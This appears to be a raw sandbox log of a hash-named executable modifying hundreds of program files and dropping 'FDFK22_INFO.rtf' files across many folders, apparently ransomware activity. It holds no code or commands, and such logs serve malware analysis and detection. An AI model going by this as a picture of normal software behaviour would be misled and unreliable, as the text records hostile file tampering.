a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Monticello a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\OptimizeRemove.jtx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montevideo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\SwitchTest.dwfx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\abcpy.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Mawson a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\access-bridge-64.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lindeman a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\tzmappings a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\chrmstp.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\external_extensions.json a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\Logo.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Lima a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_es.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Singapore a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Brussels a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Marengo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\COPYRIGHT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_pt_BR.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Kerguelen a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\WriteConvertTo.ocx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Templates\Seyes.jtp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Damascus a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.war a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\security\blacklist a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\org-openide-filesystems.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Bougainville a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_it.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-6 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4ADT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mazatlan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Almaty a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Majuro a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Fortaleza a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Midway a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Chisinau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\fonts\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Dublin a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boise a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\he.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program 